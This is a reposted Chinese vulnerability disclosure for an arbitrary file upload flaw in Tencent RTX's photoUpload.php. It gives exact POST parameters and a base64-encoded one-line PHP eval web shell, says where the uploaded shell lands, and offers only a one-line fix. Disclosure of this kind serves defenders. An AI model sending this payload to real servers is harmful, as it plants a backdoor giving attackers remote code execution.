好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

腾讯RTX上传任意文件及修复 - 网站安全 - 自学p

安装RTX后打开IP:8012网址

腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞

详细说明:

简单的一个post表单即可上传 $user_account = $_POST['user_account']; $file_name = $_POST["file_name"]; $file_data = $_POST["file_data"]; 无任何过滤 漏洞证明:

user_account=1000 file_name=s.php file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+ file_data为base64_encode数据 post提交后UserPhoto目录下生成PhotoFiles/s.php 需要extension=php_mbstring.dll开启及php4

HdhCmsTest2cto测试数据 修复方案:

上传过滤

作者 小恒@乌云

查看更多关于腾讯RTX上传任意文件及修复 - 网站安全 - 自学p的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12831
  阅读:46次

上一篇: 揭秘:浅谈两种黑客最无敌的留后门技术 - 网站

下一篇:Aspcms 1.5 COOKIES注入0day及修复 - 网站安全 - 自学

相关资讯